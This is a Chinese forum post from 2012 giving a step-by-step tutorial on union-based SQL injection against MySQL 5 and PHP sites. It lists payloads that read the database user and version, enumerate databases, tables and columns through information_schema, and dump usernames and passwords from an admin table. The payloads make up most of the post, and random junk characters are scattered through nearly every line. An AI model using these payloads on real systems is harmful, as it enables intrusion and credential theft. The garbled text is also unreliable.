4 k2 I1 n$ V3 b& G, R
教程内容:Mysql 5+php 注入
( ?$ E: {& g% W7 i' f/ c, t# r: n6 y( T' k H3 ?
1 W# Y7 k: _* Y' U1 p9 q
X% |9 ?' ` k! t# p! J. S一.查看MYSQL基本信息(库名,版本,用户), C" a# D+ F+ h3 r5 @8 L* l
3 j3 x( T r C- t
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
9 }( ]5 [8 Q0 H/ S
* s8 {2 G0 P" Y U2 F% A二.查数据库) A2 R4 x0 C) `( J
S/ z$ ^+ H( v$ X- L+ sand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
* J6 q( W5 g- z8 ?& i4 z# h& r; Qlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。6 }6 u C1 s) s8 Y8 d E8 Z$ S
. [0 a3 l9 A2 N6 j8 N# n$ z
三.暴表
5 }4 F5 W% Z$ d3 e0 {* U0 H U( |- p- o
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*6 z! c4 ~1 v7 P
* Q. L- L) E5 O9 u1 H9 T
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
! G4 w; X, d( N/ C& y+ a& C+ U
6 C% b9 K( w* t四.暴字段2 }9 s; H p# b: c3 H
: D, E# a6 ]/ {9 `* z1 `
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*6 ]1 r& N- S+ w& G
0 p5 c1 O& d/ \9 T" J0 T8 y2 s4 @
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。, O2 G6 m) Y4 j f* X( R' [& O8 D
+ j' a3 j" S F$ @- m. \五.暴数据! s' [! a! F0 ?0 E! m* }
" C1 N, |5 ~4 i: u6 o" n( d
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
x5 l) }: F2 y( O* V
! l5 l8 a: R/ R K$ X: Z
3 e- L) A }' W5 ~ y这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
F2 f' V' W4 E! S: w( t4 _$ C |
发表于 2012-9-13 16:27:53
收藏
支持
反对